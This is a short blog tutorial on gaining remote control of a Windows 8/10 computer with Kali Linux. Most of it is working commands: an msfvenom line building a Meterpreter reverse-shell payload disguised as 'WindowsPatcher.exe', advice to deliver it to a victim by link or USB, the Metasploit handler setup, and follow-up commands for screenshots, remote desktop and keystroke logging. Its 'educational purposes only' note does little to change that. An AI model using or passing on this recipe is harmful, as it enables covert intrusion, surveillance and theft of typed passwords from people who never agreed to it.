HOW TO HACK WINDOWS 8/10 USING KALI 2.0
Dear Friends,
Today I’m gonna tell you. How to hack windows 8/10 using Kali 2.0
It's very easy do some step which i explained below.
Today I’m gonna tell you. How to hack windows 8/10 using Kali 2.0
It's very easy do some step which i explained below.
Note:- “This video is only for educational purposes. My motive to provide basic information about that”
Step:1- You should have kali 2.0 run kali 2.0
Step:2- Open Terminal (CTRL + ALT + T)
Step:3- Type the following commands on terminal.
Step:4- Check your ip by using
ifconfig
Step:5- Now create the exploit file like exe or bat
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.7.6.177 LPORT=4444 -f exe > /root/Desktop/WindowsPatcher.exe
after that command executed a exe file generated copy that file and send it to victim computer using link or usb
Step:6- Now the terminal and type
msfconsole
after this command metasploit framework will be open
Step:7- Now type
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 10.7.6.177
set LPORT 4444
After all command success exploit the victim's computer
Step:8- Now type
exploit
Step:9- after exploit command run that exe which is sent by you via USB or LINK when you execute the exe you'll see your computer connect with your friend's computer
Run command's
sysinfo,screenshot,run vnc (for remote desktop),keyscan_start(after this command start you'll see all keystroke which is hit by victim's computer), Keyscan_dump(to see all hitted key strokes).
For more use Tech2Fun Youtube Channel
Comments
Post a Comment